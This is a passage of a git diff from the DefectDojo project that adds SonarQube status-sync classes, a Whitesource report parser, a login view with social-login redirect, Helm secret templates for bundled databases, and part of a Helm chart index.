[SCAN_SONARQUBE_API] + + def get_label_for_scan_types(self, scan_type): + return SCAN_SONARQUBE_API + + def get_description_for_scan_types(self, scan_type): + return "SonarQube findings can be directly imported using the SonarQube API. An API Scan Configuration has to be setup in the Product." + + def requires_file(self, scan_type): + return False + + def requires_tool_type(self, scan_type): + return 'SonarQube' + + def get_findings(self, json_output, test): + return SonarQubeApiImporter().get_findings(json_output, test) diff --git a/dojo/tools/sonarqube_api/updater.py b/dojo/tools/sonarqube_api/updater.py new file mode 100644 index 00000000000..a664eebb0eb --- /dev/null +++ b/dojo/tools/sonarqube_api/updater.py @@ -0,0 +1,136 @@ +import logging +from collections import deque + +from dojo.models import Sonarqube_Issue_Transition +from dojo.tools.sonarqube_api.importer import SonarQubeApiImporter + +logger = logging.getLogger(__name__) + + +class SonarQubeApiUpdater(object): + """ + This class updates in SonarQube, a SonarQube issue previously imported as a DefectDojo Findings. + This class maps the finding status to a SQ issue status and later on it transitions the issue + properly to a consistent status. + This way, findings marked as resolved, false positive or accepted in DefectDojo won't reappear + in future imports of SonarQube Scanner. + """ + + MAPPING_SONARQUBE_STATUS_TRANSITION = [ + { + 'from': ['OPEN', 'REOPENED'], + 'to': 'REOPENED', + 'transition': None + }, + { + 'from': ['OPEN', 'REOPENED'], + 'to': 'CONFIRMED', + 'transition': 'confirm' + }, { + 'from': ['CONFIRMED'], + 'to': 'REOPENED', + 'transition': 'unconfirm' + }, { + 'from': ['OPEN', 'REOPENED', 'CONFIRMED'], + 'to': 'RESOLVED / FIXED', + 'transition': 'resolve' + }, { + 'from': ['OPEN', 'REOPENED', 'CONFIRMED'], + 'to': 'RESOLVED / WONTFIX', + 'transition': 'wontfix' + }, { + 'from': ['OPEN', 'REOPENED', 'CONFIRMED'], + 'to': 'RESOLVED / FALSE-POSITIVE', + 'transition': 'falsepositive' + }, { + 'from': ['RESOLVED / FIXED', 'RESOLVED / WONTFIX', 'RESOLVED / FALSE-POSITIVE'], + 'to': 'REOPENED', + 'transition': 'reopen' + }, + ] + + @staticmethod + def get_sonarqube_status_for(finding): + target_status = None + if finding.false_p: + target_status = 'RESOLVED / FALSE-POSITIVE' + elif finding.mitigated or finding.is_mitigated: + target_status = 'RESOLVED / FIXED' + elif finding.risk_accepted: + target_status = 'RESOLVED / WONTFIX' + elif finding.active: + if finding.verified: + target_status = 'CONFIRMED' + else: + target_status = 'REOPENED' + return target_status + + def get_sonarqube_required_transitions_for(self, current_status, target_status): + + # If current and target is the same... do nothing + if current_status == target_status: + return + + # Check if there is at least one transition from current_status... + if not [x for x in self.MAPPING_SONARQUBE_STATUS_TRANSITION if current_status in x.get('from')]: + return + + # Starting from target_status... find out possible origin statuses that can transition to target_status + transitions = [x for x in self.MAPPING_SONARQUBE_STATUS_TRANSITION if target_status == x.get('to')] + if transitions: + for transition in transitions: + # There is a direct transition from current status... + if current_status in transition.get('from'): + t = transition.get('transition') + return [t] if t else None + + # We have the last transition to get to our target status but there is no direct transition + transitions_result = deque() + transitions_result.appendleft(transitions[0].get('transition')) + + # Find out previous transitions that would finish in any FROM of a previous to use as target + for transition in transitions: + for t_from in transition.get('from'): + possible_transition = self.get_sonarqube_required_transitions_for(current_status, t_from) + if possible_transition: + transitions_result.extendleft(possible_transition) + return list(transitions_result) + + def update_sonarqube_finding(self, finding): + + sonarqube_issue = finding.sonarqube_issue + if not sonarqube_issue: + return + + logger.debug("Checking if finding '{}' needs to be updated in SonarQube".format(finding)) + + client, _ = SonarQubeApiImporter.prepare_client(finding.test) + # we don't care about config, each finding knows which config was used during import + + target_status = self.get_sonarqube_status_for(finding) + + issue = client.get_issue(sonarqube_issue.key) + if issue: # Issue could have disappeared in SQ because a previous scan has resolved the issue as fixed + if issue.get('resolution'): + current_status = '{} / {}'.format(issue.get('status'), issue.get('resolution')) + else: + current_status = issue.get('status') + + logger.debug("--> SQ Current status: {}. Current target status: {}".format(current_status, target_status)) + + transitions = self.get_sonarqube_required_transitions_for(current_status, target_status) + if transitions: + logger.info("Updating finding '{}' in SonarQube".format(finding)) + + for transition in transitions: + client.transition_issue(sonarqube_issue.key, transition) + + # Track Defect Dojo has updated the SonarQube issue + Sonarqube_Issue_Transition.objects.create( + sonarqube_issue=finding.sonarqube_issue, + # not sure if this is needed, but looks like the original author decided to send display status to sonarcube + # we changed Accepted into Risk Accepted, but we change it back to be sure we don't break the integration + finding_status=finding.status().replace('Risk Accepted', 'Accepted') if finding.status() else finding.status(), + sonarqube_status=current_status, + transitions=','.join(transitions), + ) diff --git a/dojo/tools/sonarqube_api/updater_from_source.py b/dojo/tools/sonarqube_api/updater_from_source.py new file mode 100644 index 00000000000..9ab22c60a1b --- /dev/null +++ b/dojo/tools/sonarqube_api/updater_from_source.py @@ -0,0 +1,107 @@ +import logging + +from django.utils import timezone + +from dojo.models import Finding, Risk_Acceptance +from dojo.tools.sonarqube_api.importer import SonarQubeApiImporter +import dojo.risk_acceptance.helper as ra_helper + +logger = logging.getLogger(__name__) + + +class SonarQubeApiUpdaterFromSource(object): + """ + The responsibility of this class is to update the Finding status if current SonarQube issue status doesn't match. + + This way, findings will be updated based on SonarQube information when SonarQube is updated manually and + already imported in DefectDojo. + """ + + @staticmethod + def get_findings_to_update(): + return Finding.objects.filter( + sonarqube_issue__isnull=False, + active=True, + ).select_related('sonarqube_issue') + + def update(self, finding): + sonarqube_issue = finding.sonarqube_issue + if not sonarqube_issue: + return + + client, _ = SonarQubeApiImporter.prepare_client(finding.test) + # we don't care about config, each finding knows which config was used during import + + issue = client.get_issue(sonarqube_issue.key) + if issue: # Issue could have disappeared in SQ because a previous scan has resolved the issue as fixed + current_status = issue.get('resolution') or issue.get('status') + current_finding_status = self.get_sonarqube_status_for(finding) + logger.debug("--> SQ Current status: {}. Finding status: {}".format(current_status, current_finding_status)) + + if current_status != "OPEN" and current_finding_status != current_status: + logger.info("Original SonarQube issue '{}' has changed. Updating DefectDojo finding '{}'...".format( + sonarqube_issue, finding + )) + self.update_finding_status(finding, current_status) + + @staticmethod + def get_sonarqube_status_for(finding): + target_status = None + if finding.false_p: + target_status = 'FALSE-POSITIVE' + elif finding.mitigated or finding.is_mitigated: + target_status = 'FIXED' + elif finding.risk_accepted: + target_status = 'WONTFIX' + elif finding.active: + if finding.verified: + target_status = 'CONFIRMED' + else: + target_status = 'REOPENED' + return target_status + + @staticmethod + def update_finding_status(finding, sonarqube_status): + if sonarqube_status in ['OPEN', 'REOPENED']: + finding.active = True + finding.verified = False + finding.false_p = False + finding.mitigated = None + finding.is_mitigated = False + ra_helper.remove_finding.from_any_risk_acceptance(finding) + + elif sonarqube_status == 'CONFIRMED': + finding.active = True + finding.verified = True + finding.false_p = False + finding.mitigated = None + finding.is_mitigated = False + ra_helper.remove_finding.from_any_risk_acceptance(finding) + + elif sonarqube_status == 'FIXED': + finding.active = False + finding.verified = True + finding.false_p = False + finding.mitigated = timezone.now() + finding.is_mitigated = True + ra_helper.remove_finding.from_any_risk_acceptance(finding) + + elif sonarqube_status == 'WONTFIX': + finding.active = False + finding.verified = True + finding.false_p = False + finding.mitigated = None + finding.is_mitigated = False + Risk_Acceptance.objects.create( + owner=finding.reporter, + ).accepted_findings.set([finding]) + + elif sonarqube_status == 'FALSE-POSITIVE': + finding.active = False + finding.verified = False + finding.false_p = True + finding.mitigated = None + finding.is_mitigated = False + ra_helper.remove_finding.from_any_risk_acceptance(finding) + + finding.save(issue_updater_option=False, dedupe_option=False) diff --git a/dojo/tools/trustwave/__init__.py b/dojo/tools/trustwave/__init__.py old mode 100644 new mode 100755 diff --git a/dojo/tools/whitesource/__init__.py b/dojo/tools/whitesource/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/whitesource/parser.py b/dojo/tools/whitesource/parser.py new file mode 100644 index 00000000000..bd5356ccac7 --- /dev/null +++ b/dojo/tools/whitesource/parser.py @@ -0,0 +1,153 @@ +import hashlib +import json +import logging + +from dojo.models import Finding + +__author__ = 'dr3dd589' + +logger = logging.getLogger(__name__) + + +class WhitesourceParser(object): + + def get_scan_types(self): + return ["Whitesource Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Whitesource Scan" + + def get_description_for_scan_types(self, scan_type): + return "Import JSON report" + + def get_findings(self, file, test): + if file is None: + return list() + + data = file.read() + try: + content = json.loads(str(data, 'utf-8')) + except: + content = json.loads(data) + + def _build_common_output(node, lib_name=None): + # project only available in manual export + # name --> CVE in manual, library name in pipeline + project = "" + cve = None + component_name = None + component_version = None + if 'library' in node: + project = node.get('project') + description = "**Description** : " + node.get('description', "") + "\n\n" + \ + "**Library Name** : " + node['library'].get('name', "") + "\n\n" + \ + "**Library Filename** : " + node['library'].get('filename', "") + "\n\n" + \ + "**Library Description** : " + node['library'].get('description', "") + "\n\n" + \ + "**Library Type** : " + node['library'].get('type', "") + "\n" + lib_name = node['library'].get('filename') + component_name = node['library'].get('artifactId') + component_version = node['library'].get('version') + else: + description = node.get('description') + + cve = node.get('name') + if cve is None: + title = "CVE-None | " + lib_name + else: + title = cve + " | " + lib_name + # cvss2 by default in CLI, but cvss3 in UI. Adapting to have homogeneous behavior. + if 'cvss3_severity' in node: + cvss_sev = node.get('cvss3_severity') + else: + cvss_sev = node.get('severity') + severity = cvss_sev.lower().capitalize() + + cvss3_score = node.get('cvss3_score', "N/A") + cvss3_vector = node.get('scoreMetadataVector', "N/A") + severity_justification = "CVSS v3 score: {} ({})".format(cvss3_score, cvss3_vector) + cwe = 1035 # default OWASP a9 until the report actually has them + + mitigation = "N/A" + if 'topFix' in node: + try: + topfix_node = node.get('topFix') + mitigation = "**Resolution** ({}): {}\n" \ + .format( + topfix_node.get('date'), + topfix_node.get('fixResolution') + ) + except Exception as e: + logger.exception("Error handling topFix node.") + + filepaths = [] + if 'sourceFiles' in node: + try: + sourceFiles_node = node.get('sourceFiles') + for sfile in sourceFiles_node: + filepaths.append(sfile.get('localPath')) + except Exception as e: + logger.exception("Error handling local paths for vulnerability.") + + return {'title': title, + 'description': description, + 'severity': severity, + 'mitigation': mitigation, + 'cve': cve, + 'cwe': cwe, + 'severity_justification': severity_justification, + 'file_path': ", ".join(filepaths), + 'component_name': component_name, + 'component_version': component_version + } + + def _dedup_and_create_finding(dupes, vuln): + dupe_key = hashlib.md5(vuln.get('description').encode('utf-8') + vuln.get('title').encode('utf-8')).hexdigest() + + if dupe_key in dupes: + finding = dupes[dupe_key] + if finding.description: + finding.description = finding.description + dupes[dupe_key] = finding + else: + dupes[dupe_key] = True + + finding = Finding(title=vuln.get('title'), + test=test, + description=vuln.get('description'), + severity=vuln.get('severity'), + cwe=vuln.get('cwe'), + mitigation=vuln.get('mitigation'), + references=vuln.get('references'), + file_path=vuln.get('file_path'), + component_name=vuln.get('component_name'), + component_version=vuln.get('component_version'), + severity_justification=vuln.get('severity_justification'), + dynamic_finding=True) + if vuln.get('cve'): + finding.unsaved_vulnerability_ids = [vuln.get('cve')] + dupes[dupe_key] = finding + + output = [] + if "libraries" in content: + # we are likely dealing with a report generated from CLI with -generateScanReport, + # which will output vulnerabilities as an array of a library + # In this scenario, build up a an array + tree_libs = content.get('libraries') + for lib_node in tree_libs: + # get the overall lib info here, before going into vulns + if 'vulnerabilities' in lib_node and len(lib_node.get('vulnerabilities')) > 0: + for vuln in lib_node.get('vulnerabilities'): + output.append(_build_common_output(vuln, lib_node.get('name'))) + + elif "vulnerabilities" in content: + # likely a manual json export for vulnerabilities only for a project. + # Vulns are standalone, and library is a property. + tree_node = content['vulnerabilities'] + for node in tree_node: + output.append(_build_common_output(node)) + + dupes = dict() + for vuln in output: + _dedup_and_create_finding(dupes, vuln) + + return dupes.values() diff --git a/dojo/user/views.py b/dojo/user/views.py index dd732b5c91e..4b422f18e71 100644 --- a/dojo/user/views.py +++ b/dojo/user/views.py @@ -123,7 +123,6 @@ def api_v2_key(request): "form": form, }) - # # user specific @dojo_ratelimit(key="post:username") @dojo_ratelimit(key="post:password") @@ -166,6 +165,45 @@ def login_view(request): return DojoLoginView.as_view(template_name="dojo/login.html", authentication_form=AuthenticationForm)(request) + +@dojo_ratelimit(key='post:username') +@dojo_ratelimit(key='post:password') +def login_view(request): + if not settings.SHOW_LOGIN_FORM and settings.SOCIAL_LOGIN_AUTO_REDIRECT and sum([ + settings.GOOGLE_OAUTH_ENABLED, + settings.OKTA_OAUTH_ENABLED, + settings.AZUREAD_TENANT_OAUTH2_ENABLED, + settings.GITLAB_OAUTH2_ENABLED, + settings.AUTH0_OAUTH2_ENABLED, + settings.KEYCLOAK_OAUTH2_ENABLED, + settings.GITHUB_OAUTH2_ENABLED, + settings.GITHUB_ENTERPRISE_OAUTH2_ENABLED, + settings.SAML2_ENABLED + ]) == 1 and not ('force_login_form' in request.GET): + if settings.GOOGLE_OAUTH_ENABLED: + social_auth = 'google-oauth2' + elif settings.OKTA_OAUTH_ENABLED: + social_auth = 'okta-oauth2' + elif settings.AZUREAD_TENANT_OAUTH2_ENABLED: + social_auth = 'azuread-tenant-oauth2' + elif settings.GITLAB_OAUTH2_ENABLED: + social_auth = 'gitlab' + elif settings.KEYCLOAK_OAUTH2_ENABLED: + social_auth = 'keycloak' + elif settings.AUTH0_OAUTH2_ENABLED: + social_auth = 'auth0' + elif settings.GITHUB_OAUTH2_ENABLED: + social_auth = 'github' + elif settings.GITHUB_ENTERPRISE_OAUTH2_ENABLED: + social_auth = 'github-enterprise' + else: + return HttpResponseRedirect('/saml2/login') + return HttpResponseRedirect('{}?{}'.format(reverse('social:begin', args=[social_auth]), + urlencode({'next': request.GET.get('next')}))) + else: + return LoginView.as_view(template_name='dojo/login.html', authentication_form=AuthenticationForm)(request) + + def logout_view(request): logout(request) diff --git a/dojo/utils.py b/dojo/utils.py index 33e99846b81..deb4503bd65 100644 --- a/dojo/utils.py +++ b/dojo/utils.py @@ -1150,6 +1150,7 @@ def decrypt(key, iv, encrypted_text): return _unpad_string(decrypted_text) + def _pad_string(value): length = len(value) pad_size = 16 - (length % 16) diff --git a/dojo/wsgi.py b/dojo/wsgi.py index 9948d16733f..f406f74d5f6 100644 --- a/dojo/wsgi.py +++ b/dojo/wsgi.py @@ -15,6 +15,11 @@ """ import logging import os +import socket +import logging + + +logger = logging.getLogger(__name__) from django.core.wsgi import get_wsgi_application diff --git a/helm/defectdojo/templates/secret-mysql.yaml b/helm/defectdojo/templates/secret-mysql.yaml new file mode 100644 index 00000000000..24aee10c9b8 --- /dev/null +++ b/helm/defectdojo/templates/secret-mysql.yaml @@ -0,0 +1,32 @@ +{{- if .Values.createMysqlSecret -}} +apiVersion: v1 +kind: Secret +metadata: + name: {{ .Values.mysql.auth.existingSecret }} + labels: + app.kubernetes.io/name: {{ include "defectdojo.name" . }} + app.kubernetes.io/instance: {{ .Release.Name }} + app.kubernetes.io/managed-by: {{ .Release.Service }} + helm.sh/chart: {{ include "defectdojo.chart" . }} + annotations: + helm.sh/resource-policy: keep + helm.sh/hook: "pre-install" + helm.sh/hook-delete-policy: "before-hook-creation" +type: Opaque +data: +{{- if .Values.mysql.enabled }} +{{- if .Values.mysql.auth.rootPassword }} + mysql-root-password: {{ .Values.mysql.auth.rootPassword | b64enc | quote }} +{{- else }} + mysql-root-password: {{ randAlphaNum 10 | b64enc | quote }} +{{- end }} +{{- if .Values.mysql.auth.password }} + {{ .Values.mysql.auth.secretKey }}: {{ .Values.mysql.auth.password | b64enc | quote }} +{{- else }} + {{ .Values.mysql.auth.secretKey }}: {{ randAlphaNum 10 | b64enc | quote }} +{{- end}} + mysql-replication-password: {{ randAlphaNum 10 | b64enc | quote }} +{{- else }} + {{ .Values.mysql.auth.secretKey }}: {{ .Values.mysql.auth.password | b64enc | quote }} +{{- end }} +{{- end }} diff --git a/helm/defectdojo/templates/secret-postgresql-ha-pgpool.yaml b/helm/defectdojo/templates/secret-postgresql-ha-pgpool.yaml new file mode 100644 index 00000000000..9a440efffd1 --- /dev/null +++ b/helm/defectdojo/templates/secret-postgresql-ha-pgpool.yaml @@ -0,0 +1,23 @@ +{{- if .Values.createPostgresqlHaPgpoolSecret -}} +apiVersion: v1 +kind: Secret +metadata: + name: {{ .Values.postgresqlha.global.pgpool.existingSecret }} + labels: + app.kubernetes.io/name: {{ include "defectdojo.name" . }} + app.kubernetes.io/instance: {{ .Release.Name }} + app.kubernetes.io/managed-by: {{ .Release.Service }} + helm.sh/chart: {{ include "defectdojo.chart" . }} + annotations: + helm.sh/resource-policy: keep + helm.sh/hook: "pre-install" + helm.sh/hook-delete-policy: "before-hook-creation" +type: Opaque +data: +{{- if .Values.postgresqlha.pgpool.adminPassword }} + admin-password: {{ .Values.postgresqlha.pgpool.adminPassword | b64enc | quote }} +{{- else }} + {{- $pgpoolRandomPassword := randAlphaNum 16 | b64enc | quote }} + admin-password: {{ $pgpoolRandomPassword }} +{{- end }} +{{- end }} diff --git a/helm/defectdojo/templates/secret-postgresql-ha.yaml b/helm/defectdojo/templates/secret-postgresql-ha.yaml new file mode 100644 index 00000000000..142b1cfef5d --- /dev/null +++ b/helm/defectdojo/templates/secret-postgresql-ha.yaml @@ -0,0 +1,31 @@ +{{- if .Values.createPostgresqlHaSecret -}} +apiVersion: v1 +kind: Secret +metadata: + name: {{ .Values.postgresqlha.postgresql.existingSecret }} + labels: + app.kubernetes.io/name: {{ include "defectdojo.name" . }} + app.kubernetes.io/instance: {{ .Release.Name }} + app.kubernetes.io/managed-by: {{ .Release.Service }} + helm.sh/chart: {{ include "defectdojo.chart" . }} + annotations: + helm.sh/resource-policy: keep + helm.sh/hook: "pre-install" + helm.sh/hook-delete-policy: "before-hook-creation" +type: Opaque +data: +{{- if .Values.postgresqlha.postgresql.password }} + postgresql-password: {{ .Values.postgresqlha.postgresql.password | b64enc | quote }} + postgresql-postgres-password: {{ .Values.postgresqlha.postgresql.password | b64enc | quote }} +{{- else }} + {{- $postgresRandomPassword := randAlphaNum 16 | b64enc | quote }} + postgresql-password: {{ $postgresRandomPassword }} + postgresql-postgres-password: {{ $postgresRandomPassword }} +{{- end }} +{{- if .Values.postgresqlha.postgresql.repmgrpassword }} + repmgr-password: {{ .Values.postgresqlha.postgresql.repmgrpassword | b64enc | quote }} +{{- else }} + {{- $repmgrRandomPassword := randAlphaNum 16 | b64enc | quote }} + repmgr-password: {{ $repmgrRandomPassword }} +{{- end }} +{{- end }} diff --git a/helm/defectdojo/templates/secret-rabbitmq.yaml b/helm/defectdojo/templates/secret-rabbitmq.yaml new file mode 100644 index 00000000000..130189b181f --- /dev/null +++ b/helm/defectdojo/templates/secret-rabbitmq.yaml @@ -0,0 +1,27 @@ +{{- if .Values.createRabbitMqSecret -}} +apiVersion: v1 +kind: Secret +metadata: + name: {{ .Values.rabbitmq.auth.existingPasswordSecret }} + labels: + app.kubernetes.io/name: {{ include "defectdojo.name" . }} + app.kubernetes.io/instance: {{ .Release.Name }} + app.kubernetes.io/managed-by: {{ .Release.Service }} + helm.sh/chart: {{ include "defectdojo.chart" . }} + annotations: + helm.sh/resource-policy: keep + helm.sh/hook: "pre-install" + helm.sh/hook-delete-policy: "before-hook-creation" +type: Opaque +data: +{{- if .Values.rabbitmq.auth.password }} + rabbitmq-password: {{ .Values.rabbitmq.auth.password | b64enc | quote }} +{{- else }} + rabbitmq-password: {{ randAlphaNum 10 | b64enc | quote }} +{{- end}} +{{- if .Values.rabbitmq.auth.erlangCookie }} + rabbitmq-erlang-cookie: {{ .Values.rabbitmq.auth.erlangCookie | b64enc | quote }} +{{- else }} + rabbitmq-erlang-cookie: {{ randAlphaNum 32 | b64enc | quote }} +{{- end }} +{{- end }} diff --git a/helm/defectdojo/templates/secret-redis.yaml b/helm/defectdojo/templates/secret-redis.yaml new file mode 100644 index 00000000000..629e6b4fa93 --- /dev/null +++ b/helm/defectdojo/templates/secret-redis.yaml @@ -0,0 +1,22 @@ +{{- if .Values.createRedisSecret -}} +apiVersion: v1 +kind: Secret +metadata: + name: {{ .Values.redis.auth.existingSecret }} + labels: + app.kubernetes.io/name: {{ include "defectdojo.name" . }} + app.kubernetes.io/instance: {{ .Release.Name }} + app.kubernetes.io/managed-by: {{ .Release.Service }} + helm.sh/chart: {{ include "defectdojo.chart" . }} + annotations: + helm.sh/resource-policy: keep + helm.sh/hook: "pre-install" + helm.sh/hook-delete-policy: "before-hook-creation" +type: Opaque +data: +{{- if .Values.redis.auth.password }} + {{ .Values.redis.auth.existingSecretPasswordKey }}: {{ .Values.redis.auth.password | b64enc | quote }} +{{- else }} + {{ .Values.redis.auth.existingSecretPasswordKey }}: {{ randAlphaNum 10 | b64enc | quote }} +{{- end }} +{{- end }} diff --git a/index.yaml b/index.yaml new file mode 100644 index 00000000000..e45655feb9b --- /dev/null +++ b/index.yaml @@ -0,0 +1,8759 @@ +apiVersion: v1 +entries: + defectdojo: + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.60.0-dev + created: "2026-06-08T06:35:13.908444523Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 72f6d01ca20c00848f81c76d81f259b63ba385c6054700181eb5eb4370e99252 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.31-dev.tgz + version: 1.9.31-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.20.0 to v0.20.1 (_/defect_/Chart.yaml) + - kind: changed + description: Update valkey Docker tag from 0.20.1 to v0.20.2 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.59.0-dev + created: "2026-06-01T06:39:35.896583732Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 28cdbf913ab0b17d4fb89b0f7a232f321cd242b68baae4b12d6c06bdf5808198 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.30-dev.tgz + version: 1.9.30-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.58.4 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.58.4 + created: "2026-05-26T15:48:34.346240608Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 39fc78ca9d25669725b4924f187eac991051d180702a8793faea618b8c0ace76 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.58.4/defectdojo-1.9.29.tgz + version: 1.9.29 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.20.0 to v0.20.1 (_/defect_/Chart.yaml) + - kind: changed + description: Update valkey Docker tag from 0.20.1 to v0.20.2 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.59.0-dev + created: "2026-05-26T06:25:23.546057632Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 805f0c7c46530f0590224d6ea320ae6aace23492c303cf37a5d315fcafb649a2 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.29-dev.tgz + version: 1.9.29-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.58.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.58.3 + created: "2026-05-18T14:56:31.440301823Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: b42ce3b286560fb962cf22cf767658bd6ff6ca58616aa674772db6f458674fd5 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.58.3/defectdojo-1.9.28.tgz + version: 1.9.28 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.20.0 to v0.20.1 (_/defect_/Chart.yaml) + - kind: changed + description: Update valkey Docker tag from 0.20.1 to v0.20.2 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.59.0-dev + created: "2026-05-18T06:29:43.166090262Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3144d396eca643ca29f47869b3a0fe266019bdf356aed09ab1f2619527d79785 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.28-dev.tgz + version: 1.9.28-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.58.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.58.2 + created: "2026-05-11T15:43:29.445730139Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: bb9511b69d68fb1d1da3abeb859fe1ec057379af9fccd5d3001784892c718100 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.58.2/defectdojo-1.9.27.tgz + version: 1.9.27 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.20.0 to v0.20.1 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.59.0-dev + created: "2026-05-11T06:19:05.300949346Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.1 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 91758e33509dfee59c69c88f85bbf4d97646da19a2ac32fbf98df45777e92c3b + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.27-dev.tgz + version: 1.9.27-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.58.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.58.1 + created: "2026-05-06T19:10:24.215106923Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3f0fb624f10e356169dfcca3fc369bb61f03df5d2ac13c0cc48bb5ad5ff37d94 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.58.1/defectdojo-1.9.26.tgz + version: 1.9.26 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.59.0-dev + created: "2026-05-06T06:03:26.471592998Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 